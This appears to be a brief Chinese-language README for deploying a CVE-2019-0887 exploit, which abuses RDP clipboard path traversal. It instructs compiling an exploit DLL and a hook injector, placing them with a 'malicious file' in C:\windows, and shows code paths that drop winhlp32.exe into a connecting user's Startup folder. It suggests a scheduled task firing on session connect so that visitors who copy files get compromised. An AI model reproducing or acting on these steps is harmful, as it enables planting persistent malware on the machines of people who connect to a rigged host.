编译 CVE-2019-0887,重命名为 winhlp.dll
编译 Install_Hook,重命名为 hook.exe
注意,它们必须用 x64 编译
然后像这样放入恶意系统
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # 某个恶意文件
如果有人想要更改路径,这里是关键
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
或许可以使用 taskschd.msc 创建一个任务计划,设置触发器为"连接到用户会话时",并将文件路径设为 hook.exe。
等待有人连接到我的恶意系统,复制一些东西,然后被利用...
提示:为什么不使用 DLL 劫持?